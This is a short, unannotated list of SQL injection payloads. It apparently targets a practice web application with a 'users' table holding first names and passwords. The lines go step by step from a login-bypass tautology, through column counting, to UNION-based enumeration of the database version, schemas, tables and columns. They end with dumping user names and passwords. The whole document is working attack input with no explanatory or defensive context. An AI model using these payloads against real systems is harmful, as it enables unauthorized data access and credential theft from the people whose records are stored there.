0' OR '1=1' #
0' OR '1=1' ORDER by 3 #
0' UNION ALL SELECT 1,2 # 
0' UNION ALL SELECT version(), database()#
0' UNION ALL SELECT group_concat(schema_name),2 FROM information_schema.schemata# 
0' UNION ALL SELECT group_concat(table_name),2 FROM information_schema.tables WHERE table_schema=database() # 
0' UNION ALL SELECT group_concat(column_name),2 FROM information_schema.columns WHERE table_name='users' and table_schema=database() # 
0' UNION ALL SELECT group_concat(first_name,0x3a,password),2 FROM users #
0' UNION ALL SELECT first_name,password FROM users #